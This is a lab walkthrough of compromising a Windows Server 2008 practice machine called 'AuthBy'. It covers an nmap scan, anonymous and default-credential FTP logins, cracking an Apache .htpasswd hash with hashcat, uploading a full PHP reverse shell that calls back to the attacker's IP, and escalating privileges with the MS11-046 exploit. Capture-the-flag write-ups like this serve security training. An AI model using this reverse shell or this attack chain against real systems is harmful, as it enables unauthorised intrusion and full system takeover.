AuthBy

Nmap Scan

$ nmap -sC -sV -Pn -p- -oN nmap 192.168.213.46          
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-30 22:28 +08
Stats: 0:01:03 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 44.85% done; ETC: 22:30 (0:01:17 remaining)
Stats: 0:01:41 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 74.60% done; ETC: 22:30 (0:00:34 remaining)
Nmap scan report for 192.168.213.46
Host is up (0.0098s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT     STATE SERVICE            VERSION
21/tcp   open  ftp                zFTPServer 6.0 build 2011-10-17
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| total 9680
| ----------   1 root     root      5610496 Oct 18  2011 zFTPServer.exe
| ----------   1 root     root           25 Feb 10  2011 UninstallService.bat
| ----------   1 root     root      4284928 Oct 18  2011 Uninstall.exe
| ----------   1 root     root           17 Aug 13  2011 StopService.bat
| ----------   1 root     root           18 Aug 13  2011 StartService.bat
| ----------   1 root     root         8736 Nov 09  2011 Settings.ini
| dr-xr-xr-x   1 root     root          512 May 30 21:28 log
| ----------   1 root     root         2275 Aug 08  2011 LICENSE.htm
| ----------   1 root     root           23 Feb 10  2011 InstallService.bat
| dr-xr-xr-x   1 root     root          512 Nov 08  2011 extensions
| dr-xr-xr-x   1 root     root          512 Nov 08  2011 certificates
|_dr-xr-xr-x   1 root     root          512 Mar 23 13:28 accounts
242/tcp  open  http               Apache httpd 2.2.21 ((Win32) PHP/5.3.8)
| http-auth: 
| HTTP/1.1 401 Authorization Required\x0D
|_  Basic realm=Qui e nuce nuculeum esse volt, frangit nucem!
|_http-server-header: Apache/2.2.21 (Win32) PHP/5.3.8
|_http-title: 401 Authorization Required
3145/tcp open  zftp-admin         zFTPServer admin
3389/tcp open  ssl/ms-wbt-server?
|_ssl-date: 2024-05-30T14:30:30+00:00; -9s from scanner time.
| ssl-cert: Subject: commonName=LIVDA
| Not valid before: 2024-03-22T06:28:30
|_Not valid after:  2024-09-21T06:28:30
| rdp-ntlm-info: 
|   Target_Name: LIVDA
|   NetBIOS_Domain_Name: LIVDA
|   NetBIOS_Computer_Name: LIVDA
|   DNS_Domain_Name: LIVDA
|   DNS_Computer_Name: LIVDA
|   Product_Version: 6.0.6001
|_  System_Time: 2024-05-30T14:30:25+00:00
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -9s, deviation: 0s, median: -9s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 149.65 seconds

Initial Access

Port 21

When we login using the anonymous account, we are able to see all these files.

$ ftp 192.168.213.46
Connected to 192.168.213.46.
220 zFTPServer v6.0, build 2011-10-17 15:25 ready.
Name (192.168.213.46:ranay): anonymous
331 User name received, need password.
Password: 
230 User logged in, proceed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||2059|)
150 Opening connection for /bin/ls.
total 9680
----------   1 root     root      5610496 Oct 18  2011 zFTPServer.exe
----------   1 root     root           25 Feb 10  2011 UninstallService.bat
----------   1 root     root      4284928 Oct 18  2011 Uninstall.exe
----------   1 root     root           17 Aug 13  2011 StopService.bat
----------   1 root     root           18 Aug 13  2011 StartService.bat
----------   1 root     root         8736 Nov 09  2011 Settings.ini
dr-xr-xr-x   1 root     root          512 May 30 21:28 log
----------   1 root     root         2275 Aug 08  2011 LICENSE.htm
----------   1 root     root           23 Feb 10  2011 InstallService.bat
dr-xr-xr-x   1 root     root          512 Nov 08  2011 extensions
dr-xr-xr-x   1 root     root          512 Nov 08  2011 certificates
dr-xr-xr-x   1 root     root          512 Mar 23 13:28 accounts
226 Closing data connection.

When we go into the accounts folder, we are able see that there are 3 users there.

ftp> cd accounts
250 CWD Command successful.
ftp> dir
229 Entering Extended Passive Mode (|||2061|)
150 Opening connection for /bin/ls.
total 4
dr-xr-xr-x   1 root     root          512 Mar 23 13:28 backup
----------   1 root     root          764 Mar 23 13:28 acc[Offsec].uac
----------   1 root     root         1032 May 30 21:37 acc[anonymous].uac
----------   1 root     root          928 May 30 21:38 acc[admin].uac
226 Closing data connection.

So what if we use admin:admin to login into the ftp service. Sure enough, it works.

$ ftp 192.168.213.46
Connected to 192.168.213.46.
220 zFTPServer v6.0, build 2011-10-17 15:25 ready.
Name (192.168.213.46:ranay): admin
331 User name received, need password.
Password: 
230 User logged in, proceed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> 

However, when we login using admin, it gives us a different directory.

ftp> dir
229 Entering Extended Passive Mode (|||2062|)
150 Opening connection for /bin/ls.
total 3
-r--r--r--   1 root     root           76 Nov 08  2011 index.php
-r--r--r--   1 root     root           45 Nov 08  2011 .htpasswd
-r--r--r--   1 root     root          161 Nov 08  2011 .htaccess
226 Closing data connection.

When we look at the content of .htpasswd, we are able to see the username offsec with the password hash of $apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0

ftp> more .htpasswd
offsec:$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0

Further research on the hash, shows that it is a Apache $apr1$ MD5 hash.

We will first create the file with the hash inside first.

$ echo '$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0' > hash

Then we will try to crack it to get the password.

$ hashcat -m 1600 hash /usr/share/wordlists/rockyou.txt 
hashcat (v6.2.6) starting
...
$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0:elite
...

Now we know the account for offsec is elite.

After that we can log in to the website.

Reverse shell using webshell

Let us try if we are able to upload any random stuff into the ftp using the admin account, sure enough we are able to do it.

So the next step, we will upload a PHP webshell to call back to our local machine.

This will be the payload we will be using:

<?php
// php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down. RE: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net

set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.45.158';
$port = 4444;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; bash -i';
$daemon = 0;
$debug = 0;

if (function_exists('pcntl_fork')) {
	$pid = pcntl_fork();
	
	if ($pid == -1) {
		printit("ERROR: Can't fork");
		exit(1);
	}
	
	if ($pid) {
		exit(0);  // Parent exits
	}
	if (posix_setsid() == -1) {
		printit("Error: Can't setsid()");
		exit(1);
	}

	$daemon = 1;
} else {
	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

chdir("/");

umask(0);

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
	printit("$errstr ($errno)");
	exit(1);
}

$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
	printit("ERROR: Can't spawn shell");
	exit(1);
}

stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
	if (feof($sock)) {
		printit("ERROR: Shell connection terminated");
		break;
	}

	if (feof($pipes[1])) {
		printit("ERROR: Shell process terminated");
		break;
	}

	$read_a = array($sock, $pipes[1], $pipes[2]);
	$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

	if (in_array($sock, $read_a)) {
		if ($debug) printit("SOCK READ");
		$input = fread($sock, $chunk_size);
		if ($debug) printit("SOCK: $input");
		fwrite($pipes[0], $input);
	}

	if (in_array($pipes[1], $read_a)) {
		if ($debug) printit("STDOUT READ");
		$input = fread($pipes[1], $chunk_size);
		if ($debug) printit("STDOUT: $input");
		fwrite($sock, $input);
	}

	if (in_array($pipes[2], $read_a)) {
		if ($debug) printit("STDERR READ");
		$input = fread($pipes[2], $chunk_size);
		if ($debug) printit("STDERR: $input");
		fwrite($sock, $input);
	}
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

function printit ($string) {
	if (!$daemon) {
		print "$string\n";
	}
}

?>

We will then upload it using the admin account using ftp.

ftp> put reverse.php
local: reverse.php remote: reverse.php
229 Entering Extended Passive Mode (|||2069|)
150 File status okay; about to open data connection.
100% |*********************************************************************************************************************************************************************|  2589       54.86 MiB/s    00:00 ETA
226 Closing data connection.
2589 bytes sent in 00:00 (51.75 KiB/s)
ftp> dir
229 Entering Extended Passive Mode (|||2070|)
150 Opening connection for /bin/ls.
total 7
-r--r--r--   1 root     root         2589 May 30 21:59 reverse.php
-r--r--r--   1 root     root           76 Nov 08  2011 index.php
-r--r--r--   1 root     root           38 May 30 21:56 hash
-r--r--r--   1 root     root           45 Nov 08  2011 .htpasswd
-r--r--r--   1 root     root          161 Nov 08  2011 .htaccess
226 Closing data connection.

We will then go to that webpage to trigger the webshell.

Privilege Escalation

MS11-046

If we look at the system information, we can see the OS that the target machine is on.

C:\wamp>systeminfo

Host Name:                 LIVDA
OS Name:                   Microsoftr Windows Serverr 2008 Standard 
OS Version:                6.0.6001 Service Pack 1 Build 6001
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                92573-OEM-7502905-27565
Original Install Date:     12/19/2009, 11:25:57 AM
System Boot Time:          5/30/2024, 7:21:46 AM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2650 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 11/12/2020
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (GMT-08:00) Pacific Time (US & Canada)
Total Physical Memory:     2,047 MB
Available Physical Memory: 1,664 MB
Page File: Max Size:       1,983 MB
Page File: Available:      1,546 MB
Page File: In Use:         437 MB
Page File Location(s):     N/A
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           N/A

If we search online, we are able to find the vulnerability for this server.

Microsoft Windows (x86) - 'afd.sys' Local Privilege Escalation (MS11-046)Exploit Database

We can just follow what they mention there to privilege escalate to administrator.

First we need to create the exe file

$ x86_64-w64-mingw32-gcc 40564.c -o exploit.exe

Then we could just upload using ftp with the admin account.

Finally we just run the exploit, we are able to get administrator shell.